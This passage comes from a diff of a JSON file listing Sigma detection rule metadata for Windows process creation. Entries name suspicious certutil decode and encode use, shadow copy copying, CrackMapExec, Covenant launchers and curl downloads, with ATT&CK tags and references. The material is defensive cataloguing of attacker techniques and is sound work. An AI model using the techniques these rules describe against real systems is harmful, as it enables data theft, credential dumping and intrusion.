[ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ] + }, + "uuid": "2887e914-ce96-435f-8105-593937e90757", + "value": "Reconnaissance Activity Using BuiltIn Commands" + }, + { + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_calc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ItsReallyNick/status/1094080242686312448", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "value": "Suspicious Calculator Usage" + }, + { + "description": "Launch 64-bit shellcode from a debugger script file using cdb.exe.", + "meta": { + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate use of debugging tools" + ], + "filename": "proc_creation_win_susp_cdb.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", + "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", + "https://twitter.com/nas_bench/status/1534957360032120833", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cdb.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" + ] + }, + "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "value": "Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner" + }, + { + "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code", + "meta": { + "author": "Florian Roth, juju4, keepwatch", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_certutil_command.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.command_and_control", + "attack.t1105", + "attack.s0160", + "attack.g0007", + "attack.g0010", + "attack.g0045", + "attack.g0049", + "attack.g0075", + "attack.g0096" + ] + }, + "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", + "value": "Suspicious Certutil Command Usage" + }, + { + "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/02/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_certutil_encode.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "value": "Certutil Encode" + }, + { + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_char_in_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79", + "value": "Obfuscated Command Line Using Special Unicode Characters" + }, + { + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "meta": { + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_child_process_as_system_.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://github.com/antonioCoco/RogueWinRM", + "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.002" + ] + }, + "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "value": "Suspicious Child Process Created as System" + }, + { + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cipher.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "4b046706-5789-4673-b111-66f25fe99534", + "value": "Overwrite Deleted Data with Cipher" + }, + { + "description": "Detects suspicious process that use escape characters", + "meta": { + "author": "juju4", + "creation_date": "2018/12/11", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_cli_escape.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vysecurity/status/885545634958385153", + "https://twitter.com/Hexacorn/status/885553465417756673", + "https://twitter.com/Hexacorn/status/885570278637678592", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", + "value": "Suspicious Commandline Escape" + }, + { + "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Some FP is expected with some installers" + ], + "filename": "proc_creation_win_susp_clsid_foldername.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Kostastsale/status/1565257924204986369", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3", + "value": "Suspicious CLSID Folder Name In Suspicious Locations" + }, + { + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "meta": { + "author": "frack113", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "178e615d-e666-498b-9630-9ed363038101", + "value": "Suspicious Elevated System Shell" + }, + { + "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", + "value": "Suspicious Cmd Execution via WMI" + }, + { + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "High" + ], + "filename": "proc_creation_win_susp_cmd_http_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", + "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "value": "Command Line Execution with Suspicious URL and AppData Strings" + }, + { + "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Some rare backup scenarios" + ], + "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", + "value": "Copy from Volume Shadow Copy" + }, + { + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "meta": { + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/02/21", + "falsepositive": [ + "During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section" + ], + "filename": "proc_creation_win_susp_codepage_lookup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1614.001" + ] + }, + "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", + "value": "CHCP CodePage Locale Lookup" + }, + { + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/10/14", + "falsepositive": [ + "Administrative activity (adjust code pages according to your organisation's region)" + ], + "filename": "proc_creation_win_susp_codepage_switch.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", + "https://twitter.com/cglyer/status/1183756892952248325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" + ], + "tags": [ + "attack.t1036", + "attack.defense_evasion" + ] + }, + "uuid": "c7942406-33dd-4377-a564-0f62db0593a3", + "value": "Suspicious Code Page Switch" + }, + { + "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_commandline_chars.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml" + ], + "tags": "No established tags" + }, + "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", + "value": "Suspicious Characters in CommandLine" + }, + { + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_command_flag_pattern.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml" + ], + "tags": "No established tags" + }, + "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "value": "Suspicious RunAs-Like Flag Combination" + }, + { + "description": "Detects suspicious command line arguments of common data compression tools", + "meta": { + "author": "Florian Roth, Samir Bousseaden", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_compression_params.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1184067445612535811", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "value": "Suspicious Compression Tool Parameters" + }, + { + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_conhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", + "value": "Conhost Parent Process Executions" + }, + { + "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_conhost_option.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", + "value": "Suspicious Conhost Legacy Option" + }, + { + "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation", + "meta": { + "author": "@neonprimetime, Florian Roth", + "creation_date": "2021/09/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_control_cve_2021_40444.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", + "https://twitter.com/neonprimetime/status/1435584010202255375", + "https://www.joesandbox.com/analysis/476188/1/iochtml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", + "value": "CVE-2021-40444 Process Pattern" + }, + { + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_control_dll_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/rikvduijn/status/853251879320662017", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "value": "Suspicious Control Panel DLL Load" + }, + { + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "meta": { + "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "creation_date": "2019/12/30", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_copy_lateral_movement.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1211636381086339073", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" + ] + }, + "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "value": "Copy from Admin Share" + }, + { + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "meta": { + "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)", + "creation_date": "2020/07/03", + "falsepositive": [ + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" + ], + "filename": "proc_creation_win_susp_copy_system32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "value": "Suspicious Copy From or To System32" + }, + { + "description": "Detects suspicious command lines used in Covenant luanchers", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/06/04", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_covenant.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1564.003" + ] + }, + "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "value": "Covenant Launcher Indicators" + }, + { + "description": "Detect various execution methods of the CrackMapExec pentesting framework", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2020/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_crackmapexec_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" + ] + }, + "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", + "value": "CrackMapExec Command Execution" + }, + { + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_crackmapexec_flags.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" + ], + "tags": "No established tags" + }, + "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "value": "CrackMapExec Command Line Flags" + }, + { + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2020/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" + ] + }, + "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "value": "CrackMapExec PowerShell Obfuscation" + }, + { + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_csc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1094924091256176641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" + ] + }, + "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "value": "Suspicious Parent of Csc.exe" + }, + { + "description": "Adversaries may abuse Visual Basic (VB) for execution", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cscript_vbs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", + "value": "Cscript Visual Basic Script Execution" + }, + { + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/24", + "falsepositive": [ + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + ], + "filename": "proc_creation_win_susp_csc_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", + "https://twitter.com/gN3mes1s/status/1206874118282448897", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "value": "Suspicious Csc.exe Source File Folder" + }, + { + "description": "Detects the use of the lesser known remote execution tool named CsExec (a PsExec alternative)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_csexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/malcomvetter/CSExec", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "value": "CsExec Remote Execution Tool Usage" + }, + { + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate usage by software developers" + ], + "filename": "proc_creation_win_susp_csi.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", + "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "https://twitter.com/Z3Jpa29z/status/1317545798981324801", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1072", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", + "value": "Suspicious Csi.exe Usage" + }, + { + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali (updated)", + "creation_date": "2020/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_curl_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/max_mal_/status/1542461200797163522", + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "value": "Suspicious Curl Usage on Windows" + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "meta": { + "author": "Florian Roth", + "creation_date": 